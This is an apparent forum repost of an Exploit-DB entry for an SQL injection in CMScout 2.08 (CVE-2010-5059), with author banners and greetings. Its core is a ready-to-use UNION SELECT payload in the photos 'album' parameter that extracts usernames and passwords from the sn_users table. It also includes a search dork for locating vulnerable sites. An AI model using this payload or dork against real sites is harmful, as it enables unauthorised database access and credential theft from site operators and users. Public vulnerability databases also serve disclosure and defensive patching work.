Exploit CMScout 2.08 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12407
Проверка EDB
  1. Пройдено
Автор
DR.0RYX & CR3W-DZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-5059
Дата публикации
2010-04-26
Код:
# Title: CMScout 2.08 SQL Injection Vulnerability
# EDB-ID: 
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr.0rYX and Cr3w-DZ
# Published: 
# Verified: 
# Download Exploit Code
# Download N/A

  NNNN      NNNN        AAAAAA          SSSSSSSS      TTTTTTTTTTTT                                                
  NNNNNN    NNNN        AAAAAA        SSSSSSSSSSSS    TTTTTTTTTTTT                                                
  NNNNNN    NNNN      AAAA  AAAA      SSSS                TTTT          eeeeee        aaaaaa      mmmm  mm  mmmm  
  NNNNNNNN  NNNN      AAAA  AAAA      SSSSSSSSSS          TTTT        eeee  eeee    aaaa  aaaa    mmmmmmmmmmmmmmmm
  NNNN  NNNNNNNN    AAAA      AAAA        SSSSSSSS        TTTT        eeeeeeeeee        aaaaaa    mmmm  mmmm  mmmm
  NNNN    NNNNNN    AAAAAAAAAAAAAA            SSSS        TTTT        eeee          aaaa  aaaa    mmmm  mmmm  mmmm
  NNNN    NNNNNN    AAAAAAAAAAAAAA    SSSSSSSSSSSS        TTTT        eeeeeeeeee    aaaa  aaaa    mmmm  mmmm  mmmm
  NNNN      NNNN  AAAA          AAAA    SSSSSSSS          TTTT          eeeeee      aaaaaaaaaa    mmmm  mmmm  mmmm




                                ALGERIAN HACKER
  **********************- NORTH-AFRICA SECURITY TEAM -***********************
 
[!] Title     :  CMScout 2.08 SQL Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : [email protected]  &  [email protected]
 
***************************************************************************/
 
[ Software Information ]
 
[+] Vendor   : http://www.cmscout.za.net/
[+] script   : CMScout 2.08
[+] Download : http://www.cmscout.co.za/index.php?page=downloads&menuid=9
[+] Vulnerability : php SQL injection
[+] Dork :Powered by CMScout (c)2005 CMScout Group

 
**************************************************************************/
[ Vulnerable File ]
 
http://server/index.php?page=photos&album=[N.A.S.T ]
 
[ Exploit ]
 
http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--
 
 
 
[ Example  ]
 
http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--
 
[  Greets ]
 
[+] :CLAW , exploit-db.com,all my friends....
 
Источник
www.exploit-db.com

Похожие темы